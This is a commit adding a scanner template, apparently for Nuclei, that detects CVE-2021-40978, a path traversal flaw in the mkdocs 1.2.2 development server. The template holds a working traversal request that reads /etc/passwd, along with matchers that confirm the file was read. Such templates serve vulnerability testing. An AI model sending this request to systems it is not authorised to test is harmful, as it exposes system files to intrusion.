Create CVE-2021-40978.yaml
parent
bb5e1a56b2
commit
b22eb1ba01
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2021-40978
|
||||
|
||||
info:
|
||||
name: mkdocs 1.2.2 built-in dev-server allows directory traversal
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://github.com/nisdn/CVE-2021-40978
|
||||
tags: cve,cve2021,mkdocs,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue